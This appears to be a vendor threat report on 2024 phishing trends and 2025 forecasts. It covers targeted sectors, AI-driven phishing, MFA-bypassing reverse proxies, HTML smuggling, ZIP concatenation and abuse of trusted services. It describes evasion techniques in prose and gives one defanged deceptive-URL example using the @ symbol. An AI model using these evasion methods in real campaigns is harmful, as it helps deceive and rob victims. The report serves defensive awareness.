Despite continued efforts to combat phishing attacks, their numbers keep rising, and the techniques used are becoming increasingly sophisticated and deceptive. In this study, we examined the methods used in phishing attacks, explored the common themes attackers use, and identified the most popular phishing tools in the cybercrime market. Based on trends observed in 2024, we've made predictions about the evolution of phishing attacks in 2025 and provided recommendations to protect against them. 

This report contains information on current global cybersecurity threats based on Positive Technologies own expertise, data from Positive Technologies Expert Security Center (PT ESC) and Threat Intelligence (PT ESC TI), investigations, and reputable sources. Additionally, the research was based on data collected using the PT Knockin email security assessment tool and PT Sandbox. 

We estimate that most cyberattacks are not made public due to reputational risks. Consequently, even companies specializing in incident investigation and analysis of hacker activity are unable to quantify the precise number of threats. Our report seeks to draw the attention of companies and individuals to the key motives and methods of cyberattacks, as well as to highlight the main trends in the changing cyberthreat landscape.

This report considers each mass attack (for example, phishing emails sent to multiple addresses) as one attack, not several. For explanations of terms used in this report, please refer to the Positive Technologies glossary.

• The number of phishing attacks continues to grow: in 2024, the number of incidents increased by 33% compared to 2023 and by 72% compared to 2022.
• Mass phishing attacks are becoming more sophisticated, convincing, and well-prepared, thanks in large part to attackers using artificial intelligence.
• Cybercriminals are increasingly turning to alternative communication channels, such as social media, messaging apps, calls, and SMS. They are also combining these channels into multivector attack strategies.
• Evading security measures will remain a key challenge for attackers. Phishers are expected to increasingly use security mechanisms for malicious purposes.
• In 2025, attackers will continue distributing malicious QR codes. However, these codes will increasingly appear as malicious attachments or links rather than being embedded in email bodies.
• Trusted domains and services will be used more often in phishing attacks to make them appear legitimate.
• Archives and static web pages are expected to remain the most commonly used payloads.
• Attackers will focus on bypassing multifactor authentication (MFA).
• Targeting IT professionals and spreading malware through open-source projects will be a significant trend in 2025.
• Effective protection against phishing attacks requires a comprehensive, systemic approach that combines cybersecurity tools with organizational measures. When used together, these strategies can provide a high level of cybersecurity. Key tools and solutions include secure email gateways (SEGs), email authentication protocols (SPF, DKIM, DMARC), sandboxes, next-generation firewalls (NGFWs), secure web gateways (SWGs), endpoint detection and response (EDR), and link analysis mechanisms. These technologies enable the automatic detection and isolation of threats. At the same time, employee training remains essential for building resilience against phishing. Research shows that after six months of training, 50% of employees can identify a real phishing attack, compared to just 13% without any preparation.

Why phishing is still effective

When targeting organizations, cybercriminals are focusing less on complex technical methods and more on exploiting human behavior. To do this, they use social engineering—psychological manipulation techniques designed to trick victims into taking unsafe actions. According to a Verizon report, 68% of attacks involve human error, and it takes less than 60 seconds for someone to fall for a phishing attempt. 

Even with growing digital literacy and advancements in security technologies, people still fall victim to phishing attacks. This happens because attackers use psychological tricks and take advantage of individual traits. For example, a 2023 research article found that susceptibility to phishing can be predicted by factors such as extraversion, impulsivity, age, quick responses, and levels of openness to experience and conscientiousness.

Even when we know an email might be a phishing attempt, identifying it isn't always easy. A study on the psychology of phishing revealed that none of the participants were able to correctly identify phishing emails 100% of the time, with the average success rate being just 68%. 

Interestingly, people are more likely to fall for phishing attempts if they don't encounter them often. To test this, American researchers conducted an experiment where participants received emails with malicious attachments at varying frequencies: 1%, 5%, and 20%. The study was based on the prevalence effect, a psychological phenomenon where people tend to overlook or miss rare signals compared to those they encounter more frequently.

This shows that phishing is a threat we will continue to face. However, that doesn't mean fighting it is pointless—it's possible to significantly reduce the risks associated with these attacks. 

Phishing landscape 

In 2024, half of all successful attacks on organizations (50%) involved social engineering. The number of such incidents continues to grow: in 2024, they increased by 33% compared to 2023 and by 72% compared to 2022. One common social engineering tactic is phishing—a type of cyberattack where attackers use various communication channels to steal confidential information or infect victims with malware. According to our incident investigation reports, phishing is the second most popular method for gaining access to corporate infrastructure.

Phishing attacks target organizations of all sizes and across all industries. However, in 2024, the most frequently targeted sectors were government agencies (15%), manufacturing companies (10%), and IT firms (9%). 

Government agencies have remained high-priority targets for cybercriminals over the past few years. As digitalization accelerates, the volume of data stored and processed by these entities grows, as does the complexity of their systems—making them particularly vulnerable. Cyberattacks are increasingly being used as tools in geopolitical conflicts. These attacks aim not only to steal data but also to destabilize social and economic structures and damage the reputations of government bodies. The attackers are often highly skilled, well-organized criminal groups—advanced persistent threat (APT)¹ groups. Over 90% of APT groups use social engineering to gain initial access. In 2024, groups such as Cloud Atlas, Earth Lusca, and Kimsuky employed social engineering. Beyond APT groups, hacktivists² like Head Mare have also aggressively targeted government agencies. Ransomware groups are another major threat to government organizations. In July 2024, the ransomware group Rhysida gained access to the internal network of the city of Columbus after an employee downloaded a malicious file from a phishing website. The attackers used this foothold to escalate the attack, stealing 3.1 TB of confidential data and demanding $1.7 million in Bitcoin as ransom. When the ransom went unpaid, the criminals published the stolen data. 

Manufacturing companies rank second among sectors targeted by phishers,³ accounting for 10% of attacks. This sector is critical to national development, not just financially but also in terms of state interests and intellectual property, such as innovations and proprietary technologies. For example, the threat group Librarian Ghouls conducts industrial espionage against Russian companies, targeting files related to industrial system modeling and development software. Their attacks often involve sending malicious archives with SCR files disguised as office documents. When executed, these files download additional payload designed to steal confidential information. 

The IT industry, targeted in 9% of phishing attacks, ranked third in 2024—a trend expected to continue into 2025. This sector is strategically important for attackers: beyond financial gains, compromising IT companies allows attackers to exploit them as springboards for further attacks, such as supply chain attacks or trust-based attacks. These breaches provide access to critical resources, source code, configurations, and automation systems. One notable example from 2024 was a phishing attack on Chrome extension developers. Malicious code was embedded in at least 36 extensions, affecting over 2.6 million people. The malicious extension stole Facebook account credentials, including those for advertising and business accounts. Business accounts can be used by attackers for a variety of purposes—making direct payments from victims' credit accounts, launching phishing campaigns through the account, or selling access to third parties.

1. An APT group (Advanced Persistent Threat) is a highly skilled team of attackers, often sponsored by state actors or other interested parties, with the objective of carrying out prolonged cyberespionage. These cybercriminal groups are highly experienced and use advanced malicious tools as well as previously unknown vulnerabilities.
2. Hacktivists are cybercriminals motivated by political or social causes. Their goal is often to disrupt compromised infrastructure, either by encrypting or deleting critical data.
3. Phishers are cybercriminals who specialize in phishing attacks.

Phishing attacks on organizations can have a wide range of serious consequences, affecting various aspects. 

In 63% of phishing attacks on organizations in 2024, confidential information was stolen. For example, a breach at the medical company Ascension exposed the data of approximately 5.6 million individuals. The stolen information included medical, payment, insurance, and other personal information.

Phishing attacks caused business disruptions in 28% of cases. For instance, in October 2024, IT system failures at Casio delayed product deliveries for a week and temporarily shut down some services. A subsequent investigation by Casio revealed that attackers had used phishing emails with malicious attachments as the initial access vector. Another example is a ransomware phishing attack on Washington County, which brought county and court operations to a halt. The attackers were paid a ransom of $350,000, highlighting how even though direct financial losses account for only 5% of phishing attack consequences, they can still be substantial. 

Some incidents resulted exclusively in financial losses, often due to Business Email Compromise (BEC) attacks. For example, the European retail chain Pepco suffered €15 million in losses from such an attack, while the carbon black supplier Orion lost $60 million.

Forecast 1. The line between targeted and mass phishing will continue to blur

Phishing attacks can be broadly divided into two main categories: targeted and mass phishing. Targeted phishing focuses on specific groups of individuals. This type of phishing is highly personalized and carefully crafted, requiring attackers to invest more time and resources. However, the likelihood of success is significantly higher. Advanced Persistent Threat (APT) groups often employ this method. For example, researchers uncovered a campaign in which the Kimsuky group impersonated a South Korean government official. To execute the attack, the attackers created fake social media accounts to connect with North Korea human rights experts. They then distributed malicious links and documents. 

Corporate email compromise is another form of targeted phishing attacks. In such attacks, cybercriminals pose as trusted individuals to trick victims into sending them money or disclosing sensitive corporate information. The rise of this type of phishing has been fueled by the widespread adoption of remote work and digital communication, particularly email. Business Email Compromise (BEC) attacks are highly lucrative for attackers. According to the Anti-Phishing Working Group, the average requested amount in BEC wire transfer attacks was $84,059 in Q1 2024, rising to $89,520 in Q2 2024. 

The majority of phishing attacks, however, fall under the category of mass phishing. This involves attackers sending emails to a large number of recipients, hoping that at least a small percentage will take the desired action. In such attacks, cybercriminals often impersonate well-known brands. For instance, Check Point reports that in Q4 2024, the most frequently impersonated brands in phishing attacks were Microsoft, Apple, and Google. Researchers discovered over 5,000 fake Microsoft notifications that appeared legitimate. These emails had no grammatical errors, and their tone and formatting closely resembled official communications. 

Such credibility is becoming increasingly common in mass phishing campaigns. Researchers from Kaspersky Lab also noted this trend. A key driver behind this trend is the rapid advancement of technology, particularly AI. The incorporation of elements from targeted phishing into mass phishing campaigns is expected to gain momentum in 2025. As a result, the distinction between mass and targeted phishing will continue to blur. Not only will these messages become more prevalent, but their content will also grow more convincing. 

Forecast 2. AI will be omnipresent

Artificial intelligence (AI) is becoming deeply embedded in our daily lives. However, like any promising technology, it has also attracted the attention of cybercriminals. Social engineering is where the use of AI in cyberattacks has been most developed, approaching the fourth level (full attack automation). With AI, attackers can not only generate phishing content but also make their attacks more personalized. For this, they are likely to leverage OSINT⁴ tools enhanced with AI modules.

Attackers will increasingly use chatbots in phishing attacks. Researchers from F-Secure demonstrated how a chatbot powered by Mistral AI's LLM⁵ can extract login credentials using the simplest of instructions. Additionally, chatbots have been observed in phishing attacks where they were used to send messages in corporate messengers impersonating company executives. The capabilities of chatbots allow attackers to save time and resources on phishing operations. In the future, cybercriminals are expected to focus on improving chatbots' adaptability: their language and tactics will dynamically adjust based on the victim's responses.

The use of deep voice and deepfake technology also surged in 2024. According to a KPMG report, there was a 245% increase in the use of deepfakes in cyber incidents globally between Q1 2023 and Q1 2024. This trend is expected to continue in 2025. These technologies are particularly effective in targeted phishing and BEC attacks. One of the first notable examples occurred in early 2024, when a Hong Kong firm reported losing $25 million in a deepfake attack. In this incident, the attacker sent a message impersonating the company's CFO based in the United Kingdom. Initially, the employee suspected it was a phishing attempt, as the email mentioned the need for a confidential transaction. However, after a video call, any doubts were dispelled—the individuals on the call looked and sounded exactly like their trusted colleagues.

4. Open-source intelligence, information gathering based on publicly available sources.
5. An open-source AI model.

Forecast 3. Compromised accounts will be increasingly used in phishing attacks

Targeted phishing often originates from legitimate senders. Cybercriminals exploit the accounts of legitimate users, sometimes those with whom the victim has had prior interactions. This tactic increases the odds of deceiving the victim while also bypassing security measures. In one such case, attackers breached the account of ESET's partner in Israel to send phishing emails. These emails contained a wiper⁶ disguised as legitimate antivirus software.

In addition to breaching accounts, attackers can exploit victims' ongoing email threads. A common example of this is the technique known as email thread hijacking. Cybercriminals gain access to a user's email account, monitor their current conversations, and insert malicious messages into those threads. A similar case was reported by PT ESC TI specialists. The Hive0117 group used a compromised account to reply to a legitimate email from the past. 

Another group, Hive0145, modified this technique further. Instead of simply replying within the thread, they replaced email attachments with malicious payloads while retaining the original file name (but with a different file extension). This way, the group distributed the Strela Stealer malware.

In 2024, attackers were particularly interested in stealing credentials (22%), including those for email accounts. We expect a rise in the use of compromised email accounts in phishing attacks in 2025. These attacks will not only impact targeted organizations but also their clients. 

6.  Malware designed to erase data.

Forecast 4. Attackers will shift to messengers, social networks, and corporate platforms

Phishing can be delivered through various communication channels.

As in previous years, email remains the primary channel of social engineering attacks against organizations. This is mainly because email has long been the key means of communication between employees, partners, and clients. 

However, messengers and social networks are emerging as alternatives to email. In 2023 alone, 93% of Russian companies reported using messengers for corporate communication. Attackers are adapting accordingly: the APT group Core Werewolf has begun leveraging Telegram to target the defense industry, while other unidentified attackers have used the Signal messenger to distribute DarkCrystal RAT malware. 

Corporate platforms such as Microsoft Teams and Slack are also becoming alternative attack channels. Their popularity has surged in recent years; for instance, Microsoft Teams now boasts approximately 320 million daily active users as of 2024. Cybercriminals are capitalizing on this trend, tailoring their attacks to exploit these platforms. For example, since August 2024, the ransomware group Black Basta has been using Microsoft Teams to contact potential victims. 

In 2025, email will remain the primary channel for social engineering attacks. However, attackers will increasingly adapt their phishing tactics to current realities, shifting more attacks to messengers, social networks, and corporate platforms. 

Forecast 5. Malvertising will persist

In 2024, websites were used in 23% of phishing attacks, and this number continues to grow. For instance, researchers at BI.ZONE reported a 1.5x increase in the number of malicious websites in 2024 compared to 2023. Furthermore, around 80% of malicious websites now use the HTTPS to appear legitimate. 

Previously, we analyzed how malicious websites are often promoted via malvertising. Gen Digital researchers also noted a 17.8% increase in the use of malvertising for desktop devices and a 38.3% increase for mobile devices in Q3 2024. For example, attackers distributed the MadMxShell backdoor under the guise of popular software for IT professionals. Malvertising is expected to remain a persistent trend in 2025. 

Forecast 6. Malware infections via open-source projects will continue to increase

Since Q1 2024, there has been a significant rise in the use of package managers like PyPI and npm, as well as platforms like GitHub, in phishing attacks. To spread malware, attackers often employ typosquatting, a technique where a malicious package mimics the name of a legitimate one, capitalizing on internet users making typing errors. For example, researchers at Socket discovered six malicious npm packages imitating popular developer libraries with tens of millions of downloads. These packages contained a backdoor that allowed attackers to access victims' systems via SSH. As of the publication of Socket's research, these malicious packages had been downloaded over 700 times and were still available in the npm registry. 

In 2025, attackers will continue spreading malicious code via package managers, as this remains an effective method for compromising systems. This approach not only targets specific organizations but can also infiltrate the supply chain, impacting partner companies as well.

Forecast 7. Multichannel attacks are expected to become a trend 

Another trend expected to gain traction in 2025 is multichannel attacks. This trend began to take shape in 2024. Researchers at Trustwave SpiderLabs observed a 1.4x increase in such campaigns between July and September 2024. Many organizations are implementing robust measures to prevent phishing attacks via email. As a result, attackers are turning to other communication channels that may be less secure. For instance, Zimperium found that cybercriminals increasingly adopt a mobile-first strategy, targeting mobile devices as a major entry point into corporate systems. 

Attackers are also integrating vishing (voice phishing) and smishing (SMS phishing) into multichannel campaigns. For example, researchers at GuidePoint Security documented a case where an attacker posed as a support team member or IT employee. The attacker called the victim, claiming to assist with a VPN login issue. After gaining the victim's trust, the attacker sent an SMS containing a link to a fake VPN login page of a targeted organization. Once the victim entered their credentials, they were redirected to the legitimate VPN portal, making the attack nearly undetectable.

Forecast 8. Attackers will not only bypass security measures but exploit them for malicious purposes

In 2025, the primary challenge for attackers in phishing campaigns will be bypassing security measures. They will develop new, sophisticated methods that rely not only on technical expertise but also on exploiting human behavior. 

Common email security measures, such as secure email gateways (SEGs), DMARC⁷ authentication, DKIM signatures,⁸ and others, are designed to block spam, phishing links, malicious attachments, and other email-related threats. However, attackers are increasingly finding ways to bypass these defenses. Between January and March 2024, the number of attacks evading SEG detection surged by 52.2%, with 68.4% of these managing to pass essential authentication checks like DMARC One common tactic involves the use of compromised accounts, as previously discussed. 

Attackers are also using numerous other techniques. For instance, they've started using Blob URLs, which allow them to host phishing pages without loading data from external URLs. This makes traditional URL filtering and scanning tools ineffective at identifying malicious content. By leveraging this approach, attackers create phishing pages that are harder to block.

What's particularly alarming is that attackers are exploiting security methods themselves for malicious purposes. For example, URL Rewriting, a security technique designed to check links in emails, is now being manipulated by attackers. This method works by redirecting a user to a security server to analyze the link. If deemed safe, the user is directed to the target site; otherwise, access is blocked. Attackers have studied how this works and are now actively exploiting it.

AI- and machine learning-based security platforms, which detect anomalies by identifying deviations from "known good"⁹ signatures, unlike traditional security measures that rely on identifying "known bad" ones. However, even these advanced systems are being targeted by attackers. Researchers at SlashNext discovered a method where attackers craft emails with two separate sections: a visible portion prompting the recipient to click a link or provide information, and a hidden portion filled with harmless text meant to deceive AI/ML algorithms by simulating "legitimate" communication. Attackers rely on the assumption that users won't scroll down to see the content intended to fool AI.

Additionally, attackers evade detection using various types of malicious payloads, which we will discuss later.

Websites are also being targeted with techniques to evade automated security checks. For instance, attackers have started embedding CAPTCHA tests on malicious pages to block automated scanning. CAPTCHAs not only hinder detection but also create an illusion of legitimacy for victims, as they are commonly associated with legitimate websites. This technique has been observed in campaigns like Uncle Scam, as well as attacks by groups like Tycoon and Storm-1575 targeting U.S. schools. Additionally, anti-bot services available on darknet marketplaces enable attackers to bypass automated protections. 

Finally, attackers are adopting social engineering techniques aimed at human vulnerabilities. A notable example from 2024 is the Paste and Run method, which tricked users into copying, pasting, and running malicious code on their devices. Victims received files that displayed an error message upon opening, prompting them to execute a set of commands to "fix" the issue. Hornetsecurity reported a campaign where 105,640 phishing emails using this technique were sent from 17 attacker-controlled domains. In similar cases, fake CAPTCHAs were used as bait—a trend highlighted in Q4 2024. 

7.  An email authentication protocol designed to combat fraud and phishing attacks. DMARC works in conjunction with SPF (Sender Policy Framework) and DKIM. 
8.  Domain Keys Identified Mail (DKIM) is a digital signature confirming authenticity of the sender and guaranteeing message integrity.
9. "Known good" is an approach based on expected user behavior. Any deviation from the norm in this approach is treated as a potential threat.

Forecast 9. Malicious QR codes will continue to pose a threat

Attackers use attachments, links, and QR codes to distribute malware and collect fraudulent data. While attachments and links are the most common methods, QR codes are used less frequently. Despite their rarity, they remain a significant threat: according to Cisco Talos, while QR codes appear in only one out of every 500 emails, 60% of those contain spam or malware.

Attackers often combine these methods. For example, Positive Technologies reported that QR codes were embedded in 9% of malicious attachments, a 2.5x increase compared to QR codes directly placed in the body of emails. Embedding QR codes in documents makes it harder for security tools to analyze and block these emails before they reach employees. This attack vector frequently involves multiple devices: employees receive a phishing email on one device but scan the QR code using another, such as a personal mobile phone, which may lack the same level of protection as corporate systems. 

To evade detection, attackers are embedding ASCII and Unicode¹⁰ symbols into QR codes to bypass tools like optical character recognition (OCR), which extract, verify, and block malicious URLs in QR codes. Campaigns using these techniques have been analyzed by SlashNext and Barracuda. 

In the near future, phishing attacks involving QR codes will become an even greater threat. In 2025, we expect to see the emergence of new techniques, similar to ASCII and Unicode QR codes, that will further mask these threats from security tools. Malicious payloads, including QR codes, will increasingly migrate to attachments or links, avoiding email bodies. 

10. Character encoding standards. ASCII is used to represent characters in English, while Unicode can represent characters from almost all written languages worldwide.

Forecast 10. Archives and static web pages will be the most popular attachment types

The use of different types of malicious attachments changed compared to the previous period. Attackers' strategies are often driven by their ability to bypass security measures.

As in previous years, archive files (32%) remained one of the most frequently used attachment formats in 2024. According to statistics from PT Sandbox, archive files accounted for 38% of detected malicious files in Russia, making them the most common threat. However, due to the longstanding focus on defending against malicious archives, only 5% of archive-based attacks now reach end users unaltered, according to PT Knockin. To bypass file scanning, attackers employ techniques such as encrypting archives with passwords (often included in the email body). For example, the PhaseShifters group used this approach. Additionally, attackers are constantly experimenting with new methods. In 2024, researchers at Perception Point identified a new bypass technique involving ZIP archive concatenation, where attackers create several separate archives, with one containing the malicious payload while the others remain empty or are filled with harmless files. Similar to a Matryoshka doll, the archives are combined into a single file containing multiple nested ZIP structures. This allows attackers to hide the malicious payload in parts of the archive that some ZIP readers cannot access.

In the course of daily work, people frequently handle PDF files and office documents, such as text files, spreadsheets, and presentations. These files often appear harmless, which is why cybercriminals frequently use them in attacks (27% of malicious campaigns). Data from PT Sandbox shows that 14% of all detected malicious files were either PDFs or office documents. Similarly, PT Knockin reports that attackers successfully deliver 37% of these files by employing a variety of clever techniques to evade detection. One method observed in 2024 involved the use of deliberately corrupted Word documents as part of campaigns to distribute malicious QR codes. Attackers also continue to use older formats like RTF. For example, in March 2024, researchers documented 6,755 attacks using RTF files. In this campaign, attackers used a sneaky URL obfuscation trick involving the @ symbol. Consider this example: https://microsoft[.]com@attacker website[.]com/. At first glance, it may seem like the legitimate link leading to microsoft[.]com, but in reality, browsers ignore everything before the @ symbol and direct the user to malicious-site[.]com. Another popular file type used by attackers in 2024 was OneNote. Researchers at Unit 42 analyzed over 6,000 samples of malicious OneNote files, which were used to deliver not only script-based downloaders but also executable files.

Executable files are widely recognized as a major security risk—and for good reason: 35% of all malicious files detected by PT Sandbox fall into this category. However, modern security tools have become remarkably effective at detecting and blocking them. According to PT Knockin, only 7% of executable files now reach end users. As a result, attackers have largely abandoned this approach, with executables accounting for just 1% of all malicious email attachments. 

One of the most notable changes compares to the previous period was the growing use of static web pages in phishing attacks. These pages are now as commonly used as archive files, making up 32% of malicious content. Static web pages are highly versatile, allowing attackers to host credential-stealing forms or distribute malware. According to PT Knockin, 9% of these files reach end users. To bypass security checks, attackers use various evasion techniques like HTML Smuggling.¹¹ This method bypassed secure email gateways in 16.2% of cases during the first quarter of 2024, according to a report by Egress. Notably, attackers started employing GenAI to write HTML files using this technique. Cybercriminals are also developing and selling specialized tools that transform malicious HTML into formats that are even more difficult for security systems to recognize. 

Another tactic gaining traction is the use of images as malicious attachments (16% of cases). Malicious code or clickable links can be embedded within an image file, often without arousing user suspicion. For instance, attackers used SVG attachments to display HTML and execute JavaScript when the image is loaded, creating fake forms to steal user credentials. 

11. An attack method where malicious payloads are embedded in HTML attachments. 

In 2025, archives will remain one of the most commonly used types of malicious payloads. However, as this format becomes increasingly difficult to deliver in its original form, attackers will continue experimenting with new evasion methods, such as ZIP concatenation—a technique where multiple archives are layered to conceal malicious content. Due to their versatility and effectiveness at evading detection, static web pages are likely to remain the second most popular type of attachment. Closing out the top three will be PDF files and office documents. 

Forecast 11. Trusted services will be increasingly used in phishing attacks

To distribute malicious links, attackers increasingly rely on evasion techniques that involve legitimate services and websites. This approach helps avoid suspicion among users and allows attackers to hide within the massive volume of legitimate web traffic. Known as Living Off Trusted Sites (LOTS), this technique builds on the principles of Living off the Land (LoTL), which uses standard tools like PowerShell and WMI in cyberattacks. In the context of LOTS, attackers exploit trusted, popular services and platforms. According to a report by Abnormal Security, the use of such websites in phishing attacks—a common LOTS tactic—rose by 350% between June 2023 and July 2024. 

In 2024, the top three trusted services exploited in LOTS-based phishing campaigns were Google, Microsoft, and GitHub. Among Microsoft and Google services, cloud storage platforms like OneDrive and Google Drive were especially popular. For example, these platforms were used in phishing campaigns by groups like Earth Kasha and Earth Preta. 

GitHub was also widely abused, and attackers didn't even need to create their own malicious repositories. In one such case, they uploaded malware directly into the comments sections of legitimate repositories. These repositories belonged to tax organizations, including UsTaxes, HMRC, and Inland Revenue. Attackers lured victims via email, providing links to download the malicious content.

In Russia, a similar tactic was observed with Yandex Disk, which was used by the TaxOff, group (discovered by PT ESC experts) to distribute malicious content, including the Unicorn malware.

Trusted services can also be used as phishing lures. For example, in December 2024, attackers exploited Google Calendar to send meeting invitations embedded with links leading to Google Forms or Google Drawings. These links redirected users to phishing sites, often disguised as reCAPTCHA pages or support buttons. Attackers could double the number of phishing messages by canceling a "meeting" in Google Calendar and including a follow-up message with another phishing link.

Attackers also integrate technologies provided by trusted services into their campaigns. For instance, in 2024, Egress reported a surge in the use of AMP¹² technology to mask malicious links. While this technique first appeared in 2023, its use declined initially, but saw a steady resurgence from May to October 2024, growing by 7% during that period. This method bypasses link previews by showing users a legitimate URL (Google or TikTok), while actually redirecting them to a malicious website. It also helps evade URL scanning systems, as the initial link appears trustworthy. 

Given the 2024 trends, the use of trusted services in phishing attacks is expected to grow in 2025, both for delivering and hosting malicious content and as phishing bait.

12. A technology that speeds up the loading of web pages on mobile devices. 

Forecast 12. Phishers will focus on data theft and long-term reconnaissance

In 2024, phishing attacks focused on malware infection (63%) and credential theft (35%).

Credential-stealing forms remain a simple yet effective way to gain access to victim accounts. There are several reasons for criminals' interest in credentials. High demand on underground markets: stolen credentials are highly sought after by initial access brokers, who sell them on dark web marketplaces. According to our research, 31% of credentials sold on the dark web fall within a price range of $1,000 to $5,000, while 7% are priced even higher—over $5,000. Researchers at CYJAX also observed a steady rise in these prices each quarter. Facilitating further attacks: stolen credentials are often used as a gateway for launching more advanced cyberattacks. For instance, in one case documented by Proofpoint Threat Research, attackers sent SMS messages containing links to fake Microsoft login pages, customized with the branding of the targeted organization. These pages guided users through a multifactor authentication (MFA) process, allowing attackers to capture their credentials. Once the accounts were compromised, the attackers worked to maintain long-term access by performing actions to conceal their activity. Ultimately, they used these accounts to access business applications and create fraudulent gift cards.

Forms for stealing credentials most often mimic email login portals, which account for 56% of phishing campaigns. Among these, Office365 is the most common target, as Outlook alone represents about 38% of the corporate email market. A notable example of this was a phishing campaign uncovered by Unit 42, in which attackers successfully compromised the credentials of around 20,000 users from various European companies. By gaining access to these accounts, the attackers infiltrated the organizations' Azure cloud infrastructure and added new devices to the compromised accounts to maintain control. 

In 39% of phishing campaigns, attackers targeted credentials for portals belonging to specific organizations. For example, Resilience reported a phishing campaign by Kimsuky APT group targeting university staff, researchers, and professors in South Korea. The attackers used compromised websites to host a web shell called Green Dinosaur, which enabled them to upload phishing pages. These pages were created by scraping¹³ legitimate login portals and were designed to steal user credentials. Researchers reported that the main goal of this campaign was to gather intelligence. 

13.  A method of extracting web data from web pages. While it can be done manually, it is usually performed using code that sends GET requests to the target website. 

Although credential theft has become more prominent, the primary goal in phishing attacks remains the delivery of malware. Malware enables attackers to steal sensitive information, disrupt systems, or conduct prolonged espionage. The most commonly used malware types in 2024 were: ransomware (41%) Remote Access Trojans (RATs) (34%), and spyware (24%), which aligns with the global trend.

In 2024, the use of ransomware in phishing campaigns dropped by 15%, while the deployment of RATs increased by 14%. This trend wasn't limited to phishing campaigns; it was evident across the broader threat landscape, starting in the first quarter of 2024. The growing popularity of RATs among attackers can be explained by their versatility. These tools allow cybercriminals to collect data, monitor and control victims' systems, and conduct reconnaissance for extended periods—all while staying under the radar. The most commonly used tools in phishing campaigns in 2024 were Remcos RAT, SparkRAT, and AsyncRAT. For example, in January 2024, experts at PT ESC uncovered a phishing campaign where attackers distributed a malicious PDF file disguised as a SWIFT payment document. The PDF contained a VBS macro that ultimately resulted in the installation of Remcos RAT on the victim's system.

In 2024, spyware fell to third place among the most frequently used types of malware, although its share in phishing attacks remained stable. The most prominent spyware tools in attackers' arsenals included Lumma Stealer, Meta Stealer, and RedLine Stealer. One campaign analyzed by PT ESC targeted organizations with Lumma Stealer and NetSupport RAT. Attackers sent malicious LNK and DOCX files, which, when opened, triggered the download of malware from GitHub repositories or command-and-control servers. The attackers also invested heavily in obfuscating Lumma Stealer, making it detectable by only three antivirus engines on VirusTotal.

The noticeable shift in attackers' strategies suggests that 2025 will bring a greater focus on long-term reconnaissance, data theft, and the resale of stolen access. This shift is also being adopted by ransomware groups, who are increasingly using an exfiltration-first approach. With this method, attackers steal sensitive data before encrypting systems, allowing them to demand ransom for both file decryption and preventing the release of stolen information. The emergence of hybrid malware, such as Crystal Rans0m and Luxy, highlights this trend.

As we've previously discussed, phishing relies heavily on psychological manipulation. Attackers need to persuade their victims to open malicious emails, click on links, or take other unsafe actions. To achieve this, they often use themes designed to provoke a strong emotional response, exploiting fear, urgency, greed, or other emotions. 

One of the most common phishing strategies remains sending emails related to the recipient's work. These include messages that appear to come from contractors, employers, job applicants, and other professional contacts. For example, the SideWinder APT group conducted a phishing campaign that used fake emails about employee terminations, preying on victims' anxiety.

In 2024, phishing emails that appeared to come from HR or IT departments were particularly popular. Research from KnowBe4 found that emails from HR and IT teams were the most frequently clicked in phishing simulation tests during the first, second, and third quarters of 2024. Work-related themes are so popular because they are relevant to almost any organization and often seem routine, making them less likely to raise suspicion.

Messages impersonating government agencies are another staple in phishing campaigns. These emails manipulate fear and urgency, using the authority of the sender to pressure victims into action. For instance, PT ESC experts uncovered a phishing email purportedly from the FSTEC of Russia's Northwestern Federal District. This email was part of a multistage phishing attack. The initial email contained a low-quality PDF scan of an official-looking FSTEC letter. While the document itself wasn't malicious, its poor quality made it unusable, compelling the recipient to initiate a conversation with the sender. The attackers then sent an "improved" version of the document—a file disguised as a PDF but actually an executable. Once opened, it enabled a remote access session for the attackers.

Messages that appear to come from well-known companies are also widely used in phishing attacks. Attackers exploit the trust victims place in these organizations to make their emails more convincing. For example, cybercriminals impersonated DocuSign, a popular electronic document signing platform. Victims received emails prompting them to complete a standard DocuSign procedure by clicking a link to view and sign a document. However, the link redirected victims to a phishing website designed to steal their login credentials. Interestingly, this particular campaign specifically targeted mobile devices. If the malicious link was opened on a desktop, the user was redirected to legitimate websites.

Attackers are always quick to pick up on the latest news and trends, weaving current events into their phishing campaigns. These can range from regularly scheduled events that everyone knows about, to breaking news that grabs widespread attention. 

These events give attackers the chance to plan their campaigns in advance and craft highly convincing content. For example, they prepare each year for holiday shopping seasons, year-end deadlines, or Black Friday. Alongside these recurring events, they also take advantage of major news stories, such as political developments, sports events, conferences, and product launches. One such example involved the Earth Lusca APT group, which used documents referencing China-Taiwan relations as bait to deliver malware. This operation coincided with the Taiwanese elections and ran from late December 2023 through January 2024.

Phishing campaigns are also heavily influenced by "black swan" events—rare, unexpected incidents that are hard to predict but create widespread panic and anxiety. These situations provide attackers with ideal conditions to exploit their victims. One such event in 2024 was the global CrowdStrike outage, which disrupted 8.5 million Windows devices worldwide. Just days after the incident, phishing emails began appearing, disguised as recovery instructions from Microsoft. Another example, documented by PT ESC in August, involved attackers exploiting a newly issued municipal legal act. The document failed to display correctly, prompting victims to click the "Enable content" button to fix the issue. This action triggered embedded macros.

The evolution of the dark web has turned cybercrime into a commodity, allowing even the least skilled attackers to gain access to organizational infrastructure with minimal effort. Phishing attacks, in particular, are traditionally time- and resource-intensive for attackers—but this challenge has been addressed by Phishing-as-a-Service (PhaaS) platforms. These platforms offer ready-made phishing campaigns, with prices starting as low as $10.

PhaaS platforms typically provide the following features:

• Phishing templates for mimicking the websites of various organizations. For instance, one of the new solutions in 2024 was the Sniper Dz platform. 
• Tools for generating or cloning websites. 
• Bypassing multifactor authentication (MFA).
• Using CAPTCHA.
• Various detection evasion techniques.
• Mass email distribution.
• Help and support services.
• Dashboards with phishing campaign metrics.

Forecast 13. Tools for bypassing MFA will remain in high demand among attackers

One of the most popular PhaaS (Phishing-as-a-Service) tools is reverse-proxy solutions, which enable attackers to bypass multifactor authentication (MFA). In a traditional phishing attack, cybercriminals create a fake website with a fraudulent login page. The victim enters their credentials, is redirected to the legitimate site, and attackers use the stolen information for their purposes. Reverse-proxy tools, however, work more intricately. Instead of a static clone of the target website, attackers act as intermediaries between the legitimate site and the victim. Here's how it works: the victim sends their credentials to the attackers' reverse-proxy server. The attackers forward this request to the legitimate website. The website responds to the reverse-proxy, which then forwards the content back to the victim. When the victim enters their MFA code, the proxy server intercepts this information and relays it to the website. By intercepting MFA codes at the time of login, attackers gain access to the victim's account. 

